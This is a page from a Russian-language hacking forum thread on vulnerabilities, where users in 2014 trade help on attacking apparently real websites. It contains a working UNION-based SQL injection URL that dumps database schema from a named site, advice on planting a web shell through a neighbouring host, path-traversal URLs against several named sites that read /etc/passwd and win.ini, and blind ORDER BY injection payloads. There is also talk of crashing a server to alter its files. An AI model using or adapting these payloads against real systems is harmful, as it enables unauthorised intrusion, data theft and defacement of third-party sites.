HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 2358 из 2438 « Первая < 13581858225823082348 2354 2355 2356 2357 2358 2359 2360 2361 2362 23682408 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #23571  
Старый 18.06.2014, 20:01
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию
Цитата:
Сообщение от Aniweste  
Aniweste said:
Скрипт сработал и повис на некоторое время сервак, но когда перезагрузился файлы откатились.
Искал-искал и так не понял - откуда они подгружаются.
Есть какие-нибудь идеи?
а зачем тебе идеи? отредачит файл - запустил скрипт, сервак повис, ребнулся и вместе с ним и кеш обновился, что еще для счастья нада?
 
Ответить с цитированием

  #23572  
Старый 18.06.2014, 21:05
Aniweste
Новичок
Регистрация: 28.05.2010
Сообщений: 0
Провел на форуме:
5422

Репутация: 0
По умолчанию
Цитата:
Сообщение от qaz  
qaz said:
а зачем тебе идеи? отредачит файл - запустил скрипт, сервак повис, ребнулся и вместе с ним и кеш обновился, что еще для счастья нада?
Сервак повис -> ребутнулся -> восстановил все файлы откуда-то в их первоначальный вид.
 
Ответить с цитированием

  #23573  
Старый 18.06.2014, 21:49
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640

Репутация: 0
По умолчанию
Цитата:
Сообщение от er9j6@  
er9j6@ said:
Как залить шелл, какой вариант? Пароли сбрутить не удалось
Код:
Code:
http://fisher.spb.ru/news/message-bycatalog.php?category=2&water=-135+union+select+1,(select(@x)from(select(@x:=0x00),(select(null)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),3,4,5,6+--+
Через соседа, где file_priv Y, например поддомен uha .

Mq=off

http://fisher.spb.ru/php.php
 
Ответить с цитированием

  #23574  
Старый 18.06.2014, 21:55
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию
Цитата:
Сообщение от Aniweste  
Aniweste said:
Сервак повис -> ребутнулся -> восстановил все файлы откуда-то в их первоначальный вид.
та не, не в первоначальный вид, такого не может быть, песле перезагрузки он считывает файлы и помещает результат в кеш, тоесть в кеше окажутся последние изменения файлов
 
Ответить с цитированием

  #23575  
Старый 18.06.2014, 22:05
Aniweste
Новичок
Регистрация: 28.05.2010
Сообщений: 0
Провел на форуме:
5422

Репутация: 0
По умолчанию
Цитата:
Сообщение от qaz  
qaz said:
та не, не в первоначальный вид, такого не может быть, песле перезагрузки он считывает файлы и помещает результат в кеш, тоесть в кеше окажутся последние изменения файлов
Теперь сервак не падает.

Он выдаёт 408 на несколько секунд и дальше происходит одно из двух:

1. Либо восстанавливаются первоначальные файлы, либо

2. Ничего не происходит и новый текст так и не отображается
 
Ответить с цитированием

  #23576  
Старый 19.06.2014, 12:16
psihoz26
Guest
Сообщений: n/a
Провел на форуме:
182660

Репутация: 324
По умолчанию
Помогите пожалуйста.

Не понимаю в чём дело.

Код:
Code:
http://dviu.ranepa.ru/index.php?page=..\..\..\..\..\..\..\windows\win.ini%00

http://www.lhc-facts.ch/index.php?page=../../../../../../../../../../etc/hosts%00

http://www.spaskrug-osetia.ru/index.php?page=../../../../../../../etc/hosts%00

http://klenovskoe.ru/index.php?page=../../../../../../../../../../etc/passwd%00
 
Ответить с цитированием

  #23577  
Старый 20.06.2014, 14:26
Unknown
Guest
Сообщений: n/a
Провел на форуме:
21918

Репутация: 6
По умолчанию
В чем может быть причина того, что на некоторых сайтах запрос:

Код:
Code:
order=1 rlike (SELECT (case when(1=1) then (select 1 union select 2) else 1 end))%23
всё время возвращает пустой результат (при 1=1 или 1=0).

Инъекция в order by.
 
Ответить с цитированием

  #23578  
Старый 20.06.2014, 15:02
Unknown
Guest
Сообщений: n/a
Провел на форуме:
21918

Репутация: 6
По умолчанию
XAMEHA, при числе записи = 1 всё нормально:

Код:
Code:
select 1 FROM (SELECT 2)x WHERE 1 ORDER BY 1 rlike (SELECT (case when(1=0) then 0x28 else 1 end))
# Вернет 1
select 1 FROM (SELECT 2)x WHERE 1 ORDER BY 1 rlike (SELECT (case when(1=1) then 0x28 else 1 end))
# Вернет #1139 - Got error 'parentheses not balanced' from regexp
 
Ответить с цитированием

  #23579  
Старый 20.06.2014, 15:31
Unknown
Guest
Сообщений: n/a
Провел на форуме:
21918

Репутация: 6
По умолчанию
XAMEHA, спасибо за ссылку, так работает:

Код:
Code:
order=min(0 rlike if((%s),1,0x00))#
 
Ответить с цитированием

  #23580  
Старый 20.06.2014, 21:32
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию
никто не в курсе как через БД джомлы найти урл от сайта(кроме как искать сайт по контенту в БД), а то чёт ничего путёвого там ненахожу
 
Ответить с цитированием
Ответ
Страница 2358 из 2438 « Первая < 13581858225823082348 2354 2355 2356 2357 2358 2359 2360 2361 2362 23682408 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ